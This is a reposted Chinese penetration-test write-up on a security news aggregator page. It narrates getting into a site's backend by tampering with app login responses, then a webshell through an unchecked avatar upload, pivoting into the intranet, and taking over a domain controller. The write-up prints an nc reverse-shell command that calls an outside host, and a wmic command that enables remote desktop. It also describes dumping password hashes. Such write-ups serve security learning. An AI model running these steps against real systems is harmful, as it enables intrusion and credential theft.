Sec Hotspot 首页  排行榜  收藏本站  技术博客  RSS
统计信息
已收录文章数量:12203 篇
已收录公众号数量:89 个
本站文章为爬虫采集,如有侵权请告知
已收录微信公众号
网信中国 区块链大本营 白说区块链 区块链投资家 区块链官微 区块链铅笔Blockchain HACK学习呀 二道情报贩子 合天智汇 小白帽学习之路 小米安全中心 弥天安全实验室 SAINTSEC SecPulse安全脉搏 TideSec安全团队 360安全卫士 游侠安全网 计算机与网络安全 安全祖师爷 安全学习那些事 腾讯安全联合实验室 黑客技术与网络安全 安全圈 腾讯御见威胁情报中心 Python开发者 Python之禅 编程派 Python那些事 Python程序员 安全威胁情报 吾爱破解论坛 行长叠报 安在 i春秋 嘶吼专业版 E安全 MottoIN 网信防务 网安杂谈 数说安全 互联网安全内参 漏洞战争 安全分析与研究 邑安全 ChaMd5安全团队 天融信阿尔法实验室 安全牛 SecWiki 安全学术圈 信安之路 漏洞感知 浅黑科技 Secquan圈子社区 奇安信集团 奇安信 CERT 国舜股份 雷神众测 盘古实验室 美团安全应急响应中心 瓜子安全应急响应中心 顺丰安全应急响应中心 蚂蚁金服安全响应中心 携程安全应急响应中心 滴滴安全应急响应中心 字节跳动安全中心 百度安全应急响应中心 腾讯安全应急响应中心 网易安全应急响应中心 OPPO安全应急响应中心 京东安全应急响应中心 Bypass CNNVD安全动态 安恒应急响应中心 天融信每日安全简报 奇安信威胁情报中心 看雪学院 黑白之道 水滴安全实验室 安全客 木星安全实验室 云鼎实验室 绿盟科技安全预警 白帽汇 深信服千里目安全实验室 腾讯玄武实验室 长亭安全课堂 FreeBuf 绿盟科技 nmask
铁头娃的渗透测试
本文来自公众号:黑白之道   2020.05.31 09:49:53


文章来 源:酒仙桥六号部队


前言

争当好青年, 疫情期间,坚决执行政府与公司的要求,无奈在家办公的我一如既往的接到了渗透测试的任务。


正篇

话不多说,开干。


01

信息搜集

老规矩,第一步先从信息搜集开始。

对目标进行子域名搜集,并没有发现子域名。

扫描网站目录文件,就一个后台登陆页面,其他什么都没有发现。

之后还进行了nmap端口扫描,也没有发现什么有价值的问题。

没办法,只能正面硬刚了。 PS:体现一下我们钢铁直男的性格特征


0 2

手工测试

基于各类扫描工具都不能很好的提供有用的信息,只好掏出了我的burp,一步一步的去看。

通过抓包发现,在网站的登陆处存在明文密码传输,刚好网站也没有验证码机制( 就算表面上有验证码,各位师傅也要去尝试一下验证码重放的问题 )。


在知道初始化密码的情况下,尝试暴力枚举,看看能不能中奖。

提示用户名不存在,表示今天运气不行啊。

又尝试更改网站响应包来绕过登陆页面,也失败了。

不服输的我,又开始研究SQL注入,果不其然,SQL注入也不存在。

我这爆脾气,没有业务逻辑结构漏洞、爆破不进去、SQL注入没有……

已经开始准备划水了,但是,突然发现了一个新情况。


0 3

时来运转

由于划水的姿势比较正确( 其实信息搜集的工作一直就没有停 ),发现登陆报错的时候,网站下方会有一个图片,基于一个白帽子(小辣鸡)敏感的嗅觉,保存在本地以后查看,发现是一个二维码。

打开浏览器扫一扫二维码,发现是这个网站的app版。

柳暗花明又一村~

把app下载下来,对apk文件进行逆向分析。

无奈,逆向分析、代码审计这种东西,并不是我所擅长的方向,所以鼓捣了好久也没有结果,故而转战app的登陆以及数据传输方面的问题。


0 4

步入正轨

通过burp抓app的登陆包,并尝试修改数据,发现,登陆错误时,登陆的响应包数据为:

{"code":1}

此处待定。

这才是真正的时来运转,app登陆处存在业务逻辑漏洞,成功进入后台。

之后就是常规的后台漏洞发现了。

在个人头像处,可以进行文件上传,测试发现只在前端做限制,通过抓包修改,直接绕过,成功获取webshell。


0 5

reGeog+proxifier进行内网渗透

在获取webshell以后,发现防火墙DMZ区域映射外网端口80,使用常规lcx等反弹工具被杀毒软件拦截,尝试webshell提权无果。

一筹莫展之时,想到可以使用reGeog+proxifier正反向代理使自己进入内网。

一顿操作之后,成功进入内网。

进入内网之后,通过信息搜集,发现一台内网主机存在struts2命令执行漏洞。

直接执行命令,nc反弹端口:

nc -e cmd.exe 1.0.0.1 3389

使用powershell在线抓去本地hash,意外发现该主机登陆过域控服务器,成功抓取到域控服务器的密码。

通过域命令查询域控服务器IP,尝试远程桌面连接,但域控服务器的远程桌面并未开启。

尝试使用命令开启远程桌面,但cmd命令被限制,但可以使用wmic命令。使用misc命令:

wmic / node:%pcname%/ USER:%pcaccount%PATH

win32_terminalservicesetting WHERE(__Class!=“”)

CALL SetAllowTSConnections 1

成功登陆域控服务器。

至此,本次渗透过程圆满结束~


小结

总体来说,本次渗透还是达到了预期的目标,虽然过程磕磕绊绊的,但是还是拿到了自己想要的东西。

总结下本次渗透的知识点:

1.信息搜集很重要,全程信息搜集不要停

2.细心很重要,不要放过捕获的每一条信息

3.坚信你能搞定他